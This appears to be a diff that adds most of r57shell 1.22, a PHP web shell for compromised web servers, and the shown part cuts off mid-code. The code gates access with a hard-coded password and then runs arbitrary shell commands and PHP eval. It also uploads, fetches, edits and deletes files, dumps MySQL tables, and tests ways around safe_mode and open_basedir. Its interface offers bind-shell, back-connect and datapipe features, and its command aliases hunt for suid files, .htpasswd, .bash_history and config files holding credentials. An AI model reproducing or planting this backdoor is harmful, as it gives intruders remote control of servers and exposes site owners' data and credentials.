+/*                                 ###   ##  ########  ##   ###
+/*                                  ##    #   ######   #    ##
+/*                                   ##   #    ####   #    ##
+/*                                     ##                 ##
+/*
+/*
+/*
+/*  r57shell.php - ������ �� ��� ����������� ��� ��������� ���� �������  �� ������� ����� �������
+/*  �� ������ ������� ����� ������ �� ����� �����: http://rst.void.ru
+/*  ������: 1.22
+/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
+/*  (c)oded by 1dt.w0lf
+/*  RST/GHC http://rst.void.ru , http://ghc.ru
+/******************************************************************************************************/
+
+/* ~~~ ���������  ~~~ */
+error_reporting(0);
+set_magic_quotes_runtime(0);
+@set_time_limit(0);
+@ini_set('max_execution_time',0);
+@ini_set('output_buffering',0);
+$safe_mode = @ini_get('safe_mode');
+$version = "1.22";
+
+// $HTTP_POST_VARS --> $_POST
+if(version_compare(phpversion(), '4.1.0') == -1)
+ {
+ $_POST   = &$HTTP_POST_VARS;
+ $_GET    = &$HTTP_GET_VARS;
+ $_SERVER = &$HTTP_SERVER_VARS;
+ }
+
+/* magic_quotes */
+if (@get_magic_quotes_gpc())
+ {
+ foreach ($_POST as $k=>$v)
+  {
+  $_POST[$k]=stripslashes($v);
+  }
+ }
+
+/* ~~~ �������������� ~~~ */
+
+// ����� � ������ ��� ������� � �������
+// �� �������� ������� ����� ����������� �� �������!!!
+$name="r57"; // ����� ������������
+$pass="r57"; // ������ ������������
+
+if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!=$name || $_SERVER['PHP_AUTH_PW']!=$pass)
+   {
+   header("WWW-Authenticate: Basic realm=\"r57shell\"");
+   header("HTTP/1.0 401 Unauthorized");
+   exit("<b><a href=http://rst.void.ru>r57shell</a> : Access Denied</b>");
+   }
+$head = '<!-- ����������  ���� -->
+<html>
+<head>
+<title>r57shell</title>
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
+
+<STYLE>
+tr {
+BORDER-RIGHT:  #aaaaaa 1px solid;
+BORDER-TOP:    #eeeeee 1px solid;
+BORDER-LEFT:   #eeeeee 1px solid;
+BORDER-BOTTOM: #aaaaaa 1px solid;
+}
+td {
+BORDER-RIGHT:  #aaaaaa 1px solid;
+BORDER-TOP:    #eeeeee 1px solid;
+BORDER-LEFT:   #eeeeee 1px solid;
+BORDER-BOTTOM: #aaaaaa 1px solid;
+}
+table {
+BORDER-RIGHT:  #eeeeee 1px outset;
+BORDER-TOP:    #eeeeee 1px outset;
+BORDER-LEFT:   #eeeeee 1px outset;
+BORDER-BOTTOM: #eeeeee 1px outset;
+BACKGROUND-COLOR: #D4D0C8;
+}
+input {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: 8pt Verdana;
+}
+select {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: 8pt Verdana;
+}
+submit {
+BORDER-RIGHT:  buttonhighlight 2px outset;
+BORDER-TOP:    buttonhighlight 2px outset;
+BORDER-LEFT:   buttonhighlight 2px outset;
+BORDER-BOTTOM: buttonhighlight 2px outset;
+BACKGROUND-COLOR: #e4e0d8;
+width: 30%;
+}
+textarea {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: Fixedsys bold;
+}
+BODY {
+margin-top: 1px;
+margin-right: 1px;
+margin-bottom: 1px;
+margin-left: 1px;
+}
+A:link {COLOR:red; TEXT-DECORATION: none}
+A:visited { COLOR:red; TEXT-DECORATION: none}
+A:active {COLOR:red; TEXT-DECORATION: none}
+A:hover {color:blue;TEXT-DECORATION: none}
+</STYLE>';
+
+
+/* show phpinfo */
+if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
+/* delete script */
+if(isset($_GET['delete']))
+ {
+   @unlink(@substr(@strrchr($_SERVER['PHP_SELF'],"/"),1));
+ }
+/* delete tmp files */
+if(isset($_GET['tmp']))
+ {
+   @unlink("/tmp/bdpl");
+   @unlink("/tmp/back");
+   @unlink("/tmp/bd");
+   @unlink("/tmp/bd.c");
+   @unlink("/tmp/dp");
+   @unlink("/tmp/dpc");
+   @unlink("/tmp/dpc.c");
+ }
+/* show php.ini vars */
+if(isset($_GET['phpini']))
+{
+echo $head;
+function U_value($value)
+ {
+ if ($value == '') return '<i>no value</i>';
+ if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';
+ if ($value === null) return 'NULL';
+ if (@is_object($value)) $value = (array) $value;
+ if (@is_array($value))
+ {
+ @ob_start();
+ print_r($value);
+ $value = @ob_get_contents();
+ @ob_end_clean();
+ }
+ return U_wordwrap((string) $value);
+ }
+
+ function U_wordwrap($str)
+ {
+ $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true);
+ return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str);
+ }
+
+if (@function_exists('ini_get_all'))
+ {
+ $r = '';
+ echo '<table width=100%>', '<tr><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>';
+ foreach (@ini_get_all() as $key=>$value)
+  {
+  $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>';
+  }
+ echo $r;
+ echo '</table>';
+ }
+echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+die();
+}
+/* info about cpu */
+if(isset($_GET['cpu']))
+ {
+   echo $head;
+   echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>';
+   $cpuf = @file("cpuinfo");
+   if($cpuf)
+    {
+      $c = @sizeof($cpuf);
+      for($i=0;$i<$c;$i++)
+        {
+          $info = @explode(":",$cpuf[$i]);
+          if($info[1]==""){ $info[1]="---"; }
+          $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
+        }
+      echo $r;
+    }
+   else
+    {
+      echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
+    }
+   echo '</table>';
+   echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+   die();
+ }
+/* info about mem */
+if(isset($_GET['mem']))
+ {
+   echo $head;
+   echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>';
+   $memf = @file("meminfo");
+   if($memf)
+    {
+      $c = sizeof($memf);
+      for($i=0;$i<$c;$i++)
+        {
+          $info = explode(":",$memf[$i]);
+          if($info[1]==""){ $info[1]="---"; }
+          $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
+        }
+      echo $r;
+    }
+   else
+    {
+      echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
+    }
+   echo '</table>';
+   echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+   die();
+ }
+
+/*
+����� �����
+$language='ru' - �������
+$language='eng' - ����������
+*/
+$language='ru';
+
+$lang=array(
+'ru_text1' =>'����������� �������',
+'ru_text2' =>'���������� ������ �� �������',
+'ru_text3' =>'��������� �������',
+'ru_text4' =>'������� ����������',
+'ru_text5' =>'�������� ������ �� ������',
+'ru_text6' =>'��������� ����',
+'ru_text7' =>'������',
+'ru_text8' =>'�������� �����',
+'ru_butt1' =>'���������',
+'ru_butt2' =>'���������',
+'ru_text9' =>'�������� ����� � �������� ��� � /bin/bash',
+'ru_text10'=>'������� ����',
+'ru_text11'=>'������ ��� �������',
+'ru_butt3' =>'�������',
+'ru_text12'=>'back-connect',
+'ru_text13'=>'IP-�����',
+'ru_text14'=>'����',
+'ru_butt4' =>'���������',
+'ru_text15'=>'�������� ������ � ���������� �������',
+'ru_text16'=>'������������',
+'ru_text17'=>'��������� ����',
+'ru_text18'=>'��������� ����',
+'ru_text19'=>'Exploits',
+'ru_text20'=>'������������',
+'ru_text21'=>'����� ���',
+'ru_text22'=>'datapipe',
+'ru_text23'=>'��������� ����',
+'ru_text24'=>'��������� ����',
+'ru_text25'=>'��������� ����',
+'ru_text26'=>'������������',
+'ru_butt5' =>'���������',
+'ru_text28'=>'������ � safe_mode',
+'ru_text29'=>'������ ��������',
+'ru_butt6' =>'�������',
+'ru_text30'=>'�������� �����',
+'ru_butt7' =>'�������',
+'ru_text31'=>'���� �� ������',
+'ru_text32'=>'���������� PHP ����',
+'ru_text33'=>'�������� ����������� ������ ����������� open_basedir ����� ������� cURL',
+'ru_butt8' =>'���������',
+'ru_text34'=>'�������� ����������� ������ ����������� safe_mode ����� ������� include',
+'ru_text35'=>'�������� ����������� ������ ����������� safe_mode ����� �������� ����� � mysql',
+'ru_text36'=>'&nbsp;&nbsp;&nbsp;&nbsp;����',
+'ru_text37'=>'�����',
+'ru_text38'=>'������&nbsp;&nbsp;',
+'ru_text39'=>'�������',
+'ru_text40'=>'���� ������� mysql �������',
+'ru_butt9' =>'����',
+'ru_text41'=>'��������� ���� � �����',
+'ru_text42'=>'�������������� �����',
+'ru_text43'=>'������������� ����',
+'ru_butt10'=>'���������',
+'ru_butt11'=>'�������������',
+'ru_text44'=>'�������������� ����� ����������! ������ ������ ��� ������!',
+'ru_text45'=>'���� ��������',
+'ru_text46'=>'�������� phpinfo()',
+'ru_text47'=>'�������� �������� php.ini',
+'ru_text48'=>'�������� ��������� ������',
+'ru_text49'=>'�������� ������� � �������',
+'ru_text50'=>'���������� � ����������',
+'ru_text51'=>'���������� � ������',
+'ru_text52'=>'����� ��� ������',
+'ru_text53'=>'������ � �����',
+'ru_text54'=>'����� ������ � ������',
+'ru_butt12'=>'�����',
+'ru_text55'=>'������ � ������',
+'ru_text56'=>'������ �� �������',
+'ru_text57'=>'�������/������� ����/����������',
+'ru_text58'=>'���',
+'ru_text59'=>'����',
+'ru_text60'=>'����������',
+'ru_butt13'=>'�������/�������',
+'ru_text61'=>'���� ������',
+'ru_text62'=>'���������� �������',
+'ru_text63'=>'���� ������',
+'ru_text64'=>'���������� �������',
+'ru_text65'=>'�������',
+'ru_text66'=>'�������',
+'ru_text67'=>'Chown/Chgrp/Chmod',
+'ru_text68'=>'�������',
+'ru_text69'=>'��������1',
+'ru_text70'=>'��������2',
+'ru_text71'=>"������ �������� �������:\r\n- ��� CHOWN - ��� ������ ������������ ��� ��� UID (������) \r\n- ��� ������� CHGRP - ��� ������ ��� GID (������) \r\n- ��� ������� CHMOD - ����� ����� � ������������ ������������� (�������� 0777)",
+'ru_text72'=>'����� ��� ������',
+'ru_text73'=>'������ � �����',
+'ru_text74'=>'������ � ������',
+'ru_text75'=>'* ����� ������������ ���������� ���������',
+'ru_text76'=>'����� ������ � ������ � ������� ������� find',
+/* --------------------------------------------------------------- */
+'eng_text1' =>'Executed command',
+'eng_text2' =>'Execute command on server',
+'eng_text3' =>'&nbsp;Run command',
+'eng_text4' =>'Work directory',
+'eng_text5' =>'Upload files on server',
+'eng_text6' =>'Local file',
+'eng_text7' =>'Aliases',
+'eng_text8' =>'Select alias',
+'eng_butt1' =>'Execute',
+'eng_butt2' =>'Upload',
+'eng_text9' =>'Bind port to /bin/bash',
+'eng_text10'=>'Port',
+'eng_text11'=>'Password for access',
+'eng_butt3' =>'Bind',
+'eng_text12'=>'back-connect',
+'eng_text13'=>'IP',
+'eng_text14'=>'Port',
+'eng_butt4' =>'Connect',
+'eng_text15'=>'Upload files from remote server',
+'eng_text16'=>'&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;With',
+'eng_text17'=>'&nbsp;&nbsp;Remote file',
+'eng_text18'=>'&nbsp;&nbsp;&nbsp;Local file',
+'eng_text19'=>'Exploits',
+'eng_text20'=>'&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Use',
+'eng_text21'=>'&nbsp;New name',
+'eng_text22'=>'datapipe',
+'eng_text23'=>'Local port',
+'eng_text24'=>'Remote host',
+'eng_text25'=>'Remote port',
+'eng_text26'=>'Use',
+'eng_butt5' =>'Run',
+'eng_text28'=>'Work in safe_mode',
+'eng_text29'=>'ACCESS DENIED',
+'eng_butt6' =>'Change',
+'eng_text30'=>'&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Cat file',
+'eng_butt7' =>'  Show  ',
+'eng_text31'=>'File not found',
+'eng_text32'=>'Eval PHP code',
+'eng_text33'=>'Test bypass open_basedir with cURL functions',
+'eng_butt8' =>'Test',
+'eng_text34'=>'Test bypass safe_mode with include function',
+'eng_text35'=>'Test bypass safe_mode with load file in mysql',
+'eng_text36'=>'Database',
+'eng_text37'=>'Login',
+'eng_text38'=>'Password',
+'eng_text39'=>'Table',
+'eng_text40'=>'Dump table from mysql server',
+'eng_butt9' =>'Dump',
+'eng_text41'=>'Save dump in file',
+'eng_text42'=>'Edit files',
+'eng_text43'=>'File for edit',
+'eng_butt10'=>'Save',
+'eng_text44'=>'Can\'t edit file! Only read access!',
+'eng_text45'=>'File saved',
+'eng_text46'=>'Show phpinfo()',
+'eng_text47'=>'Show variables from php.ini',
+'eng_text48'=>'Delete temp files',
+'eng_butt11'=>'Edit file',
+'eng_text49'=>'Delete script from server',
+'eng_text50'=>'View cpu info',
+'eng_text51'=>'View memory info',
+'eng_text52'=>'Find text',
+'eng_text53'=>'In dirs',
+'eng_text54'=>'Find text in files',
+'eng_butt12'=>'Find',
+'eng_text55'=>'Only in files',
+'eng_text56'=>'Nothing :(',
+'eng_text57'=>'Create/Delete File/Dir',
+'eng_text58'=>'name',
+'eng_text59'=>'file',
+'eng_text60'=>'dir',
+'eng_butt13'=>'Create/Delete',
+'eng_text61'=>'File created',
+'eng_text62'=>'Dir created',
+'eng_text63'=>'File deleted',
+'eng_text64'=>'Dir deleted',
+'eng_text65'=>'Create',
+'eng_text66'=>'Delete',
+'eng_text67'=>'Chown/Chgrp/Chmod',
+'eng_text68'=>'Command',
+'eng_text69'=>'param1',
+'eng_text70'=>'param2',
+'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",
+'eng_text72'=>'Text for find',
+'eng_text73'=>'Find in folder',
+'eng_text74'=>'Find in files',
+'eng_text75'=>'* you can use regexp',
+'eng_text76'=>'Search text in files via find',
+);
+
+/*
+������ ������
+��������� �������� ������������� ������ ����� � ���-�� ������. ( ������� ��������� ���� ��������� ���� )
+�� ������ ���� ��������� ��� �������� �������.
+*/
+
+$aliases=array(
+/* ����� �� ������� ���� ������ � suid ����� */
+'find suid files'=>'find / -type f -perm -04000 -ls',
+/* ����� � ������� ���������� ���� ������ � suid ����� */
+'find suid files in current dir'=>'find . -type f -perm -04000 -ls',
+/* ����� �� ������� ���� ������ � sgid ����� */
+'find sgid files'=>'find / -type f -perm -02000 -ls',
+/* ����� � ������� ���������� ���� ������ � sgid ����� */
+'find sgid files in current dir'=>'find . -type f -perm -02000 -ls',
+/* ����� �� ������� ������ config.inc.php */
+'find config.inc.php files'=>'find / -type f -name config.inc.php',
+/* ����� � ��� ���� config.inc.php */
+'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php',
+/* ����� �� ������� ������ config* */
+'find config* files'=>'find / -type f -name "config*"',
+/* ����� � ������� ���������� ������ config* */
+'find config* files in current dir'=>'find . -type f -name "config*"',
+/* ����� �� ������� ���� ������ ��������� �� ������ ��� ���� */
+'find all writable files'=>'find / -type f -perm -2 -ls',
+/* ����� � ������� ���������� ���� ������ ��������� �� ������ ��� ���� */
+'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
+/* ����� �� ������� ���� ���������� ��������� �� ������ ��� ���� */
+'find all writable directories'=>'find /  -type d -perm -2 -ls',
+/* ����� � ������� ���������� ���� ���������� ��������� �� ������ ��� ���� */
+'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
+/* ����� �� ������� ���� ���������� � ������ ��������� �� ������ ��� ���� */
+'find all writable directories and files'=>'find / -perm -2 -ls',
+/* ����� � ������� ���������� ���� ���������� � ������ ��������� �� ������ ��� ���� */
+'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
+/* ����� �� ������� ������ service.pwd ... frontpage =))) */
+'find all service.pwd files'=>'find / -type f -name service.pwd',
+/* ����� � ������� ���������� ������ service.pwd */
+'find service.pwd files in current dir'=>'find . -type f -name service.pwd',
+/* ����� �� ������� ������ .htpasswd */
+'find all .htpasswd files'=>'find / -type f -name .htpasswd',
+/* ����� � ������� ���������� ������ .htpasswd */
+'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd',
+/* ����� ���� ������ .bash_history */
+'find all .bash_history files'=>'find / -type f -name .bash_history',
+/* ����� � ������� ���������� ������ .bash_history */
+'find .bash_history files in current dir'=>'find . -type f -name .bash_history',
+/* ����� ���� ������ .fetchmailrc */
+'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc',
+/* ����� � ������� ���������� ������ .fetchmailrc */
+'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc',
+/* ����� ������ ��������� ������ �� �������� ������� ext2fs */
+'list file attributes on a Linux second extended file system'=>'lsattr -va',
+/* �������� �������� ������ */
+'show opened ports'=>'netstat -an | grep -i listen',
+'----------------------------------------------------------------------------------------------------'=>'ls -la'
+);
+
+/* html */
+$table_up1  = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: ";
+$table_up2  = " ::</div></b></font></td></tr><tr><td>";
+$table_up3  = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc>";
+$table_end1 = "</td></tr>";
+$arrow      = " <font face=Wingdings color=gray>�</font>";
+$lb         = "<font color=black>[</font>";
+$rb         = "<font color=black>]</font>";
+$font       = "<font face=Verdana size=-2>";
+
+/* change dir */
+if (!empty($_POST['dir'])) { @chdir($_POST['dir']); }
+$dir = @getcwd();
+
+/* get OS */
+$windows = 0;
+$unix = 0;
+if(strlen($dir)>1 && $dir[1]==":") $windows=1; else $unix=1;
+if(empty($dir))
+ { // �� ������ ���� �� ������� �������� ����������
+ $os = getenv('OS');
+ if(empty($os)){ $os = php_uname(); } // ������� �������� ����� php_uname()
+ if(empty($os)){ $os ="-"; $unix=1; } // ���� ������ �� ���������� �� ����� unix =)
+ else
+    {
+    if(@eregi("^win",$os)) { $windows = 1; }
+    else { $unix = 1; }
+    }
+ }
+
+
+/* search text in files */
+if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text")
+  {
+    echo $head;
+    if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); }
+    else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); }
+    $sr->SearchText(0,0);
+    $res = $sr->GetResultFiles();
+    $found = $sr->GetMatchesCount();
+    $titles = $sr->GetTitles();
+    $r = "";
+    if($found > 0)
+    {
+      $r .= "<TABLE width=100%>";
+      foreach($res as $file=>$v)
+      {
+        $r .= "<TR>";
+        $r .= "<TD colspan=2><font face=Verdana size=-2><b>".ws(3);
+        $r .= ($windows)? str_replace("/","\\",$file) : $file;
+        $r .= "</b></font></ TD>";
+        $r .= "</TR>";
+        foreach($v as $a=>$b)
+        {
+          $r .= "<TR>";
+          $r .= "<TD align=center><B><font face=Verdana size=-2>".$a."</font></B></TD>";
+          $r .= "<TD><font face=Verdana size=-2>".ws(2).$b."</font></TD>";
+          $r .= "</TR>\n";
+        }
+      }
+      $r .= "</TABLE>";
+    echo $r;
+    }
+    else
+    {
+      echo "<P align=center><B><font face=Verdana size=-2>".$lang[$language.'_text56']."</B></font></P>";
+    }
+  echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+  die(); // show founded strings and die
+  }
+
+/* �������� ���� ����� �� �� ��������� ������� ��� ����������� safe_mode. ���� ��� �� ������� ��� ���� ������� */
+/* ������� ������������� ���������� ������ �� ����� ����� ���� �������� �� cmd.exe ������������                */
+/* ���� ����� � php.ini ��������� disable_functions                                                            */
+if($windows&&!$safe_mode)
+ {
+ $uname = ex("ver");
+ if(empty($uname)) { $safe_mode = 1; }
+ }
+else if($unix&&!$safe_mode)
+ {
+ $uname = ex("uname");
+ if(empty($uname)) { $safe_mode = 1; }
+ }
+
+/* get server info */
+$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE');
+if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; }
+
+/* FUNCTIONS */
+
+/* WriteSpace */
+/* tnx to virus for idea */
+function ws($i)
+{
+return @str_repeat("&nbsp;",$i);
+}
+
+function ex($cfe)
+{
+ if (!empty($cfe))
+ {
+  if(function_exists('exec'))
+   {
+    @exec($cfe,$res);
+    $res = join("\n",$res);
+   }
+  elseif(function_exists('shell_exec'))
+   {
+    $res = @shell_exec($cfe);
+   }
+  elseif(function_exists('system'))
+   {
+    @ob_start();
+    @system($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(function_exists('passthru'))
+   {
+    @ob_start();
+    @passthru($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(@is_resource($f = @popen($cfe,"r")))
+  {
+   $res = "";
+   while(!@feof($f)) { $res .= @fread($f,1024); }
+   @pclose($f);
+  }
+ }
+ if(!empty($res)) return $res; else return 0;
+}
+
+/* write error */
+function we($i)
+{
+if($GLOBALS['language']=="ru"){ $text = '������! �� ���� �������� � ���� '; }
+else { $text = "[-] ERROR! Can't write in file "; }
+echo "<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
+}
+
+/* read error */
+function re($i)
+{
+if($GLOBALS['language']=="ru"){ $text = '������! �� ���� ��������� ���� '; }
+else { $text = "[-] ERROR! Can't read file "; }
+echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
+}
+
+/* create error */
+function ce($i)
+{
+if($GLOBALS['language']=="ru"){ $text = "�� ������� ������� "; }
+else { $text = "Can't create "; }
+echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
+}
+
+/* permissions */
+function perms($mode)
+{
+if ($GLOBALS['windows']) return 0;
+if( $mode & 0x1000 ) $type='p';
+else if( $mode & 0x2000 ) $type='c';
+else if( $mode & 0x4000 ) $type='d';
+else if( $mode & 0x6000 ) $type='b';
+else if( $mode & 0x8000 ) $type='-';
+else if( $mode & 0xA000 ) $type='l';
+else if( $mode & 0xC000 ) $type='s';
+else $type='u';
+$owner["read"] = ($mode & 00400) ? 'r' : '-';
+$owner["write"] = ($mode & 00200) ? 'w' : '-';
+$owner["execute"] = ($mode & 00100) ? 'x' : '-';
+$group["read"] = ($mode & 00040) ? 'r' : '-';
+$group["write"] = ($mode & 00020) ? 'w' : '-';
+$group["execute"] = ($mode & 00010) ? 'x' : '-';
+$world["read"] = ($mode & 00004) ? 'r' : '-';
+$world["write"] = ($mode & 00002) ? 'w' : '-';
+$world["execute"] = ($mode & 00001) ? 'x' : '-';
+if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
+if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
+if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
+$s=sprintf("%1s", $type);
+$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
+$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
+$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
+return trim($s);
+}
+
+/* find path to */
+function which($pr)
+{
+if ($GLOBALS['windows']) { return 0; }
+$path = ex("which $pr");
+if(!empty($path)) return $path; else return 0;
+}
+
+/* create file */
+function cf($fname,$text)
+{
+ $w_file=@fopen($fname,"w") or we($fname);
+ if($w_file)
+ {
+ @fputs($w_file,@base64_decode($text));
+ @fclose($w_file);
+ }
+}
+
+if (!@function_exists("view_size"))
+{
+function view_size($size)
+{
+ if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
+ elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
+ elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
+ else {$size = $size . " B";}
+ return $size;
+}
+}
+
+function DirFiles($dir,$types='')
+  {
+    $files = Array();
+    if($handle = @opendir($dir))
+    {
+      while (false !== ($file = @readdir($handle)))
+      {
+        if ($file != "." && $file != "..")
+        {
+          if(!is_dir($dir."/".$file))
+          {
+            if($types)
+            {
+              $pos = @strrpos($file,".");
+              $ext = @substr($file,$pos,@strlen($file)-$pos);
+              if(@in_array($ext,@explode(';',$types)))
+                $files[] = $dir."/".$file;
+            }
+            else
+              $files[] = $dir."/".$file;
+          }
+        }
+      }
+      @closedir($handle);
+    }
+    return $files;
+  }
+
+  function DirFilesWide($dir)
+  {
+    $files = Array();
+    $dirs = Array();
+    if($handle = @opendir($dir))
+    {
+      while (false !== ($file = @readdir($handle)))
+      {
+        if ($file != "." && $file != "..")
+        {
+          if(@is_dir($dir."/".$file))
+          {
+            $file = @strtoupper($file);
+            $dirs[$file] = '&lt;DIR&gt;';
+          }
+          else
+            $files[$file] = @filesize($dir."/".$file);
+        }
+      }
+      @closedir($handle);
+      @ksort($dirs);
+      @ksort($files);
+      $files = @array_merge($dirs,$files);
+    }
+    return $files;
+  }
+
+  function DirFilesR($dir,$types='')
+  {
+    $files = Array();
+    if($handle = @opendir($dir))
+    {
+      while (false !== ($file = @readdir($handle)))
+      {
+        if ($file != "." && $file != "..")
+        {
+          if(@is_dir($dir."/".$file))
+            $files = @array_merge($files,DirFilesR($dir."/".$file,$types));
+          else
+          {
+            $pos = @strrpos($file,".");
+            $ext = @substr($file,$pos,@strlen($file)-$pos);
+            if($types)
+            {
+              if(@in_array($ext,explode(';',$types)))
+                $files[] = $dir."/".$file;
+            }
+            else
+              $files[] = $dir."/".$file;
+          }
+        }
+      }
+      @closedir($handle);
+    }
+    return $files;
+  }
+
+  function DirPrintHTMLHeaders($dir)
+  {
+    $handle = @opendir($dir) or die("Can't open directory $dir");
+    echo "    <ul style='margin-left: 0px; padding-left: 20px;'>\n";
+    while (false !== ($file = @readdir($handle)))
+    {
+      if ($file != "." && $file != "..")
+      {
+        if(@is_dir($dir."/".$file))
+        {
+          echo "      <li><b>[ $file ]</b></li>\n";
+          DirPrintHTMLHeaders($dir."/".$file);
+        }
+        else
+        {
+          $pos = @strrpos($file,".");
+          $ext = @substr($file,$pos,@strlen($file)-$pos);
+          if(@in_array($ext,array('.htm','.html')))
+          {
+            $header = '-=None=-';
+            $strings = @file($dir."/".$file) or die("Can't open file ".$dir."/".$file);
+            for($a=0;$a<count($strings);$a++)
+            {
+              $pattern = '(<title>(.+)</title>)';
+              if(@eregi($pattern,$strings[$a],$pockets))
+              {
+                $header = "&laquo;".$pockets[2]."&raquo;";
+                break;
+              }
+            }
+            echo "      <li>".$header."</li>\n";
+          }
+        }
+      }
+    }
+    echo "    </ul>\n";
+    @closedir($handle);
+  }
+
+  class SearchResult
+  {
+    var $text;
+    var $FilesToSearch;
+    var $ResultFiles;
+    var $FilesTotal;
+    var $MatchesCount;
+    var $FileMatschesCount;
+    var $TimeStart;
+    var $TimeTotal;
+    var $titles;
+
+    function SearchResult($dir,$text,$filter='')
+    {
+      $dirs = @explode(";",$dir);
+      $this->FilesToSearch = Array();
+      for($a=0;$a<count($dirs);$a++)
+        $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter));
+      $this->text = $text;
+      $this->FilesTotal = @count($this->FilesToSearch);
+      $this->TimeStart = getmicrotime();
+      $this->MatchesCount = 0;
+      $this->ResultFiles = Array();
+      $this->FileMatchesCount = Array();
